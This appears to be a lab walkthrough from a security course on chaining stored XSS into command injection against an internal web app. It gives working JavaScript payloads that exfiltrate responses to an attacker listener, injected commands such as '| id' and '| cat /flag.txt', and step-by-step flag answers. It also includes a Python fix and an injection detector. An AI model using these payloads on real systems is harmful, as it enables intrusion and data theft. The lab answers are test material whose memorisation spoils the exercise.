Exploiting internal Web Applications II
After discussing how to exploit a SQL injection vulnerability in an internal web application through an XSS vulnerability, we will explore how to exploit a command injection vulnerability through XSS in this section. While the methodology is the same, it is crucial to understand it well since the process is complex but powerful. A thorough understanding can help in the identification of complex real-world vulnerabilities.
Identifying the Vulnerability
The identification process is essentially identical to the one discussed in the previous section. We will use the same base XSS payload, and the admin endpoint contains a reference to another internal web application at https://internal.internal-webapps-2.htb. We can use the following payload to exfiltrate the index page of the internal web application:
```javascript
// Synchronous request to the internal web application from the victim's browser
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://internal.internal-webapps-2.htb/', false);
xhr.send();
// Forward the base64-encoded response to the exfiltration server
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

This reveals the following HTML content, which indicates that we can use the web application to check the status of different web applications:
HTML form to select a web application with radio buttons for different URLs and a submit button labeled 'Check.'
We can craft the corresponding POST request by analyzing the form to identify how exactly the web application implements this functionality:
```javascript
var xhr = new XMLHttpRequest();
// Form field name and value taken from the exfiltrated HTML form
var params = `webapp_selector=${encodeURIComponent("https://internal-webapps-2.htb")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

This results in the following response:

```
HTTP/1.1 200 OK
```
Let us try a non-existing domain to see if we can provoke an error message:
```javascript
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("https://doesnotexist.htb")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

This results in the following response:

```
curl: (6) Could not resolve host: doesnotexist.htb
```
As we can see, the status seems to be obtained using curl. If the submitted value is passed to a shell command without proper sanitization, this is a potential command injection vulnerability. We can verify this by injecting an additional curl command that sends a request to the exfiltration server:
```javascript
var xhr = new XMLHttpRequest();
// The pipe terminates the intended curl command and starts a second one
var params = `webapp_selector=${encodeURIComponent("| curl -k https://10.10.14.144:4443?pwn")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

Afterward, we can see the expected request in the exfiltration server, thus confirming the command injection vulnerability:

```
kabaneridev@htb[/htb]$ python3 server.py
10.129.233.62 - - [01/Jan/2025 15:10:56] "GET /?pwn HTTP/1.1" 200 -
10.129.233.62 - - [01/Jan/2025 15:10:56] code 404, message File not found
10.129.233.62 - - [01/Jan/2025 15:10:56] "GET /exfil?r=PCFET0NUWVBFIGh0bWw+CjxodG1sPgoKPGhlYWQ+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEiPgo8L2hlYWQ+Cgo8Ym9keT4KCiAgICA8aDI+Q2hlY2sgU3RhdHVzPC9oMj4KCiAgICA8ZGl2IGNsYXNzPSJtb2RhbCI+CiAgICAgICAgICAlIFRvdGFsICAgICUgUmVjZWl2ZWQgJSBYZmVyZCAgQXZlcmFnZSBTcGVlZCAgIFRpbWUgICAgVGltZSAgICAgVGltZSAgQ3VycmVudAoKICAgIDwvZGl2PgoKICAgIDxkaXYgY2xhc3M9Im1vZGFsIj4KCiAgICAgICAgPGZvcm0gYWN0aW9uPSIvY2hlY2siIG1ldGhvZD0icG9zdCI+CgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPGI+U2VsZWN0IHRoZSBXZWIgQXBwbGljYXRpb248L2I+CiAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0icmFkaW8iIGlkPSJtYWluIiBuYW1lPSJ3ZWJhcHBfc2VsZWN0b3IiIHZhbHVlPSJodHRwczovL2ludGVybmFsLXdlYmFwcHMtMi5odGIiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0ibWFpbiI+aW50ZXJuYWwtd2ViYXBwcy0yLmh0YjwvbGFiZWw+PGJyPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0iaW50ZXJuYWwiIG5hbWU9IndlYmFwcF9zZWxlY3RvciIgdmFsdWU9Imh0dHBzOi8vaW50ZXJuYWwuaW50ZXJuYWwtd2ViYXBwcy0yLmh0YiI+CiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJpbnRlcm5hbCI+aW50ZXJuYWwuaW50ZXJuYWwtd2ViYXBwcy0yLmh0YjwvbGFiZWw+PGJyPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0iYXBpIiBuYW1lPSJ3ZWJhcHBfc2VsZWN0b3IiIHZhbHVlPSJodHRwczovL2FwaS5pbnRlcm5hbC13ZWJhcHBzLTIuaHRiIj4KICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9ImFwaSI+YXBpLmludGVybmFsLXdlYmFwcHMtMi5odGI8L2xhYmVsPgoKICAgICAgICAgICAgICAgIDxidXR0b24gdHlwZT0ic3VibWl0Ij5DaGVjazwvYnV0dG9uPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Zvcm0+CiAgICA8L2Rpdj4KCjwvYm9keT4KCjwvaHRtbD4= HTTP/1.1" 404 -
```

Exploiting the Vulnerability
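Before moving on to exploitation, it is worth seeing the server-side root cause the confirmation above points to. The following is added example code, not the lab's own server: the handler shape is assumed, and the allowlist reuses the three radio-button values from the exfiltrated form. It shows the shell-string pattern that lets `| id` through beside a hardened version (exact allowlist plus an argv list, no shell), and a small log-review helper for spotting injected values.

```python
"""Root cause and fix for the status check (constructed illustration).

Added example, not the lab's server: the handler shape is assumed. The
allowlist reuses the three radio-button values from the form on this page.
"""
import shlex
import subprocess

ALLOWED_TARGETS = {
    "https://internal-webapps-2.htb",
    "https://internal.internal-webapps-2.htb",
    "https://api.internal-webapps-2.htb",
}


def vulnerable_command(webapp_selector: str) -> str:
    """Assumed vulnerable pattern: the form value is pasted into a shell string.

    With '| id' this becomes 'curl -sI | id', and a shell runs both commands.
    """
    return f"curl -sI {webapp_selector}"


def is_allowed_target(webapp_selector: str) -> bool:
    """Exact-match allowlist; the form only ever offers these three values."""
    return webapp_selector in ALLOWED_TARGETS


def safe_command(webapp_selector: str) -> list[str]:
    """Hardened form: allowlist check, then an argv list so no shell parses it."""
    if not is_allowed_target(webapp_selector):
        raise ValueError("webapp_selector not in allowlist")
    return ["curl", "-sI", "--", webapp_selector]


def run_check(webapp_selector: str) -> int:
    """Run the hardened check without a shell; returns curl's exit status."""
    argv = safe_command(webapp_selector)
    return subprocess.run(argv, capture_output=True, timeout=10, check=False).returncode


def looks_injected(webapp_selector: str) -> bool:
    """Log-review helper: flag shell metacharacters or anything not a single token."""
    if any(ch in webapp_selector for ch in "|;&$`\n"):
        return True
    try:
        return len(shlex.split(webapp_selector)) != 1
    except ValueError:  # unbalanced quotes are suspicious as well
        return True
```

`run_check` is the only function that touches the network; the rest can be exercised offline against the values seen in this section.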
We can specify the command injection payload in our XSS payload and exfiltrate the result to the exfiltration server. Exploitation thus does not differ from other command injection vulnerabilities. For instance, we can execute the id command:
```javascript
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| id")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

The result is contained in the base64-encoded response:

```
uid=0(root) gid=0(root) groups=0(root)
```

Exploiting internal Web Applications II Questions
Question 1: Exploit the XSS vulnerability to target the internal web application and obtain the flag.
1. Add the necessary vHosts to your /etc/hosts file:

```
sudo sh -c 'echo "10.129.233.62 exploitserver.htb internal-webapps-2.htb" >> /etc/hosts'
```

2. Log in to the vulnerable site (https://internal-webapps-2.htb) using the credentials htb-stdnt:...!

3. Submit your base XSS payload as a guestbook entry:

```
<script src="https://exploitserver.htb/exploit"></script>
```

4. Prepare a payload on the exploit server (https://exploitserver.htb) that exploits the command injection vulnerability on the internal site identified in the section's reading. The payload needs to execute the command cat /flag.txt and send the output to the exfiltration server:

```javascript
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| cat /flag.txt")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
// PWNIP and PWNPO are placeholders for your own listener's IP and port
exfil.open("GET", "https://PWNIP:PWNPO/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```

5. After the victim triggers the payload, decode the Base64 encoded blob to reveal the flag.